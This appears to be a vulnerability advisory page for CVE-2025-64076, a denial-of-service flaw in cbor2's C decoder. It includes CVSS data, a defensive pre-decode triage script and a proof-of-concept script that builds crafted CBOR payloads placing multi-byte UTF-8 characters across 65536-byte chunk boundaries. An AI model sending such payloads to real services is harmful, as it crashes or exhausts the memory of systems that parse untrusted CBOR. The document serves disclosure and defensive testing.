Security Vulnerability Report

CVE-2025-64076

Published: 2025-11-18 18:16:14
Last Modified: 2025-12-31 02:02:15

Description

Multiple vulnerabilities exist in cbor2 through version 5.7.0 in the decode_definite_long_string() function of the C extension decoder (source/decoder.c): (1) Integer Underflow Leading to Out-of-Bounds Read (CWE-191, CWE-125): An incorrect variable reference and missing state reset in the chunk processing loop causes buffer_length to not be reset to zero after UTF-8 character consumption. This results in subsequent chunk_length calculations producing negative values (e.g., chunk_length = 65536 - buffer_length), which are passed as signed integers to the read() method, potentially triggering unlimited read operations and resource exhaustion. (2) Memory Leak via Missing Reference Count Release (CWE-401): The main processing loop fails to release Python object references (Py_DECREF) for chunk objects allocated in each iteration. For CBOR strings longer than 65536 bytes, this causes cumulative memory leaks proportional to the payload size, enabling memory exhaustion attacks through repeated processing of large CBOR payloads. Both vulnerabilities can be exploited remotely without authentication by sending specially-crafted CBOR data containing definite-length text strings with multi-byte UTF-8 characters positioned at 65536-byte chunk boundaries. Successful exploitation results in denial of service through process crashes (CBORDecodeEOF exceptions) or memory exhaustion. The vulnerabilities affect all applications using cbor2's C extension to process untrusted CBOR data, including web APIs, IoT data collectors, and message queue processors. Fixed in commit 851473490281f82d82560b2368284ef33cf6e8f9 pushed with released version 5.7.1.
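
The advisory pins the trigger to one concrete shape of input: a definite-length text string, decoded by the chunked long-string path, with a multi-byte UTF-8 sequence that begins in one 65536-byte chunk and ends in the next. The following is an added example, written for this page and not code from the cbor2 project, that inspects untrusted CBOR before it reaches the decoder and reports exactly those conditions (plus a declared length the input cannot satisfy, the path that ends in CBORDecodeEOF, and strings above a size limit). It also encodes correct major-type-3 headers for any length, which matters because a 70000-byte string needs the 32-bit (0x7A) form, not the 16-bit (0x79) form. The item walker, the function names, the sample map document and the CHUNK constant are this example's own; CHUNK is assumed to match the chunk size the advisory names.

```python
"""Pre-decode triage for the CVE-2025-64076 trigger pattern.

Added example, not cbor2 project code. A minimal RFC 8949 item walker
locates every definite-length text string in a CBOR document; each one is
then checked for a multi-byte UTF-8 sequence straddling a 65536-byte chunk
boundary, a declared length the input cannot satisfy, or an oversized
string. All names and CHUNK are this example's own assumptions.
"""
import struct

CHUNK = 65536  # assumption: the chunk size named in the advisory


def encode_text_header(length: int) -> bytes:
    """CBOR major-type-3 initial bytes for a definite text string of `length` bytes."""
    if length < 24:
        return bytes([0x60 | length])
    if length < 0x100:
        return bytes([0x78, length])
    if length < 0x10000:
        return b"\x79" + struct.pack(">H", length)
    if length < 0x1_0000_0000:
        return b"\x7a" + struct.pack(">I", length)
    return b"\x7b" + struct.pack(">Q", length)


def _read_arg(buf, pos):
    """Decode one initial byte: (major, value, next_pos); value None = indefinite."""
    ib = buf[pos]
    major, ai = ib >> 5, ib & 0x1F
    pos += 1
    if ai < 24:
        return major, ai, pos
    if ai == 31:
        return major, None, pos
    fmt = {24: ">B", 25: ">H", 26: ">I", 27: ">Q"}.get(ai)
    if fmt is None:
        raise ValueError(f"reserved additional info {ai}")
    (value,) = struct.unpack_from(fmt, buf, pos)
    return major, value, pos + struct.calcsize(fmt)


def iter_text_strings(buf, pos=0):
    """Yield (body_offset, declared_length) for each definite text string inside
    the item at `pos`; the generator's return value is the offset past the item."""
    major, value, pos = _read_arg(buf, pos)
    if major in (2, 3):  # byte string / text string
        if value is None:  # indefinite: definite chunks until the 0xFF break
            while buf[pos] != 0xFF:
                pos = yield from iter_text_strings(buf, pos)
            return pos + 1
        if major == 3:
            yield pos, value
        return pos + value
    if major in (4, 5):  # array / map
        if value is None:
            while buf[pos] != 0xFF:
                pos = yield from iter_text_strings(buf, pos)
            return pos + 1
        for _ in range(value * (2 if major == 5 else 1)):
            pos = yield from iter_text_strings(buf, pos)
        return pos
    if major == 6:  # tag: one enclosed item follows the argument
        return (yield from iter_text_strings(buf, pos))
    return pos  # integers, simple values and floats carry no payload


def utf8_boundary_straddles(body, chunk=CHUNK):
    """(offset, length) of multi-byte UTF-8 sequences that start in one
    `chunk`-sized block of `body` and end in the next one."""
    hits, i = [], 0
    while i < len(body):
        b = body[i]
        if b >> 5 == 0b110:
            n = 2
        elif b >> 4 == 0b1110:
            n = 3
        elif b >> 3 == 0b11110:
            n = 4
        else:
            n = 1  # ASCII, or a stray continuation / invalid lead byte
        if n > 1 and i // chunk != (i + n - 1) // chunk:
            hits.append((i, n))
        i += n
    return hits


def triage(buf, max_text_len=1 << 20):
    """Findings for a CBOR document; an empty list means no trigger condition seen."""
    findings = []
    try:
        for off, length in iter_text_strings(buf):
            if length > max_text_len:
                findings.append(f"text string at {off}: declared {length} bytes exceeds limit {max_text_len}")
            elif off + length > len(buf):
                findings.append(f"text string at {off}: declared {length} bytes, only {len(buf) - off} present")
            else:
                for i, n in utf8_boundary_straddles(buf[off:off + length]):
                    findings.append(f"text string at {off}: {n}-byte UTF-8 sequence crosses a "
                                    f"{CHUNK}-byte chunk boundary at body offset {i}")
    except (IndexError, ValueError, struct.error):
        findings.append("malformed or truncated CBOR")
    return findings


if __name__ == "__main__":
    # Constructed sample: map {"k": <70000-byte text>} whose value places the
    # 3-byte "€" at body offsets 65534..65536, i.e. across the first chunk edge.
    body = b"B" * 65534 + "\u20ac".encode() + b"C" * (70000 - 65537)
    doc = b"\xa1" + encode_text_header(1) + b"k" + encode_text_header(70000) + body
    for finding in triage(doc):
        print(finding)
```

The walker recurses once per nesting level, so Python's recursion limit bounds the depth it tolerates; a deeply nested document is reported as malformed rather than parsed. Treat this as a front-door filter and a way to build test vectors, not as a substitute for upgrading to cbor2 5.7.1.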

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:agronholm:cbor2:*:*:*:*:*:python:*:* - VULNERABLE
cbor2 <= 5.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2025-64076: cbor2 C Extension Decoder Integer Underflow and Memory Leak

This PoC demonstrates the vulnerability in cbor2's decode_definite_long_string()
function where improper handling of UTF-8 characters at 65536-byte chunk
boundaries causes integer underflow and memory leaks.

Affected: cbor2 <= 5.7.0
Fixed: cbor2 >= 5.7.1
"""
import struct


def create_malicious_cbor_payload():
    """
    Create a malicious CBOR payload that triggers integer underflow in
    decode_definite_long_string() when multi-byte UTF-8 characters are
    positioned at 65536-byte chunk boundaries.
    """
    payload = bytearray()

    # CBOR header for definite-length text string (major type 3).
    # We need a string length that causes UTF-8 chars to span the 65536 boundary.
    # Target: 65535 bytes, ending with a 3-byte character.
    # 65535 = 0xFFFF, encoded as 0x79 0xFF 0xFF (major type 3, 16-bit length)
    header = bytes([0x79, 0xFF, 0xFF])  # text string, length 65535

    # First 65532 bytes of ASCII data
    payload.extend(b'A' * 65532)

    # Add a 3-byte UTF-8 character (e.g., € which is 0xE2 0x82 0xAC).
    # This will cause buffer_length to not be properly reset at the boundary.
    payload.extend(b'\xe2\x82\xac')  # 3-byte UTF-8 character

    # Prepend CBOR header
    full_payload = header + bytes(payload)
    return bytes(full_payload)


def create_large_cbor_for_memory_leak():
    """
    Create a large CBOR payload to demonstrate the memory leak.
    For strings > 65536 bytes, each chunk leaks Python object references.
    """
    # Create CBOR with a large definite-length string (> 65536 bytes)
    payload = bytearray()

    # Header: text string with length > 65536.
    # 70000 = 0x00011170 does not fit a 16-bit length, so use the 32-bit
    # form: 0x7A followed by a big-endian uint32.
    length = 70000
    header = bytes([0x7A]) + struct.pack('>I', length)

    # Fill with data containing a UTF-8 character across the chunk boundary
    payload.extend(b'B' * 65534)
    payload.extend(b'\xe2\x82\xac')  # UTF-8 char spanning bytes 65534..65536
    payload.extend(b'C' * (length - len(payload)))  # pad to exactly `length` bytes
    return header + bytes(payload)


def test_vulnerability():
    """Test if the cbor2 library is vulnerable"""
    try:
        import cbor2
        print(f"[+] cbor2 version: {cbor2.__version__}")
    except ImportError:
        print("[-] cbor2 not installed. Install with: pip install cbor2")
        print("    Note: Install version <= 5.7.0 to test vulnerability")
        return False

    # Check if using the C extension (vulnerable path)
    try:
        from cbor2 import CBORDecoder
        from io import BytesIO

        # The C extension is the _cbor2 module; the pure-Python decoder is
        # not affected by this CVE.
        print(f"[*] CBORDecoder implementation: {CBORDecoder.__module__}")
        if CBORDecoder.__module__ != '_cbor2':
            print("[-] Pure-Python decoder in use; the vulnerable C path is not exercised")

        # Test 1: Integer underflow PoC
        print("\n[*] Test 1: Testing integer underflow vulnerability...")
        try:
            malicious_payload = create_malicious_cbor_payload()
            decoder = CBORDecoder(BytesIO(malicious_payload))
            result = decoder.decode()
            print(f"[!] Unexpected: Decoding succeeded, result length: {len(result)}")
        except Exception as e:
            print(f"[!] Exception caught: {type(e).__name__}: {e}")
            if "memory" in str(e).lower() or "decode" in str(e).lower():
                print("[+] Vulnerability triggered - integer underflow detected")

        # Test 2: Memory leak demonstration
        print("\n[*] Test 2: Testing memory leak vulnerability...")
        print("    Note: Monitor memory usage during decoding")
        try:
            large_payload = create_large_cbor_for_memory_leak()
            decoder = CBORDecoder(BytesIO(large_payload))
            result = decoder.decode()
            print(f"[!] Decoded successfully, length: {len(result)}")
        except Exception as e:
            print(f"[!] Exception: {type(e).__name__}: {e}")

        return True

    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    print("=" * 70)
    print("CVE-2025-64076 PoC - cbor2 Integer Underflow and Memory Leak")
    print("=" * 70)
    print("\nVulnerability Description:")
    print("  - Integer underflow in decode_definite_long_string()")
    print("  - Memory leak due to missing Py_DECREF calls")
    print("  - Both can cause denial of service\n")

    test_vulnerability()

    print("\n" + "=" * 70)
    print("Remediation: Upgrade to cbor2 >= 5.7.1")
    print("Commit: 851473490281f82d82560b2368284ef33cf6e8f9")
    print("=" * 70)

References

https://github.com/agronholm/cbor2/commit/851473490281f82d82560b2368284ef33cf6e8f9 (Patch)
https://github.com/agronholm/cbor2/issues/264 (Exploit, Issue Tracking)
https://github.com/agronholm/cbor2/pull/265 (Exploit, Issue Tracking, Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64076", "sourceIdentifier": "[email protected]", "published": "2025-11-18T18:16:14.263", "lastModified": "2025-12-31T02:02:14.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple vulnerabilities exist in cbor2 through version 5.7.0 in the decode_definite_long_string() function of the C extension decoder (source/decoder.c): (1) Integer Underflow Leading to Out-of-Bounds Read (CWE-191, CWE-125): An incorrect variable reference and missing state reset in the chunk processing loop causes buffer_length to not be reset to zero after UTF-8 character consumption. This results in subsequent chunk_length calculations producing negative values (e.g., chunk_length = 65536 - buffer_length), which are passed as signed integers to the read() method, potentially triggering unlimited read operations and resource exhaustion. (2) Memory Leak via Missing Reference Count Release (CWE-401): The main processing loop fails to release Python object references (Py_DECREF) for chunk objects allocated in each iteration. For CBOR strings longer than 65536 bytes, this causes cumulative memory leaks proportional to the payload size, enabling memory exhaustion attacks through repeated processing of large CBOR payloads. Both vulnerabilities can be exploited remotely without authentication by sending specially-crafted CBOR data containing definite-length text strings with multi-byte UTF-8 characters positioned at 65536-byte chunk boundaries. Successful exploitation results in denial of service through process crashes (CBORDecodeEOF exceptions) or memory exhaustion. The vulnerabilities affect all applications using cbor2's C extension to process untrusted CBOR data, including web APIs, IoT data collectors, and message queue processors. Fixed in commit 851473490281f82d82560b2368284ef33cf6e8f9 pushed with released version 5.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-191"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:agronholm:cbor2:*:*:*:*:*:python:*:*", "versionEndIncluding": "5.7.0", "matchCriteriaId": "AE04A1BB-A030-4607-9B76-8CFEC625F070"}]}]}], "references": [{"url": "https://github.com/agronholm/cbor2/commit/851473490281f82d82560b2368284ef33cf6e8f9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/agronholm/cbor2/issues/264", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/agronholm/cbor2/pull/265", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}]}}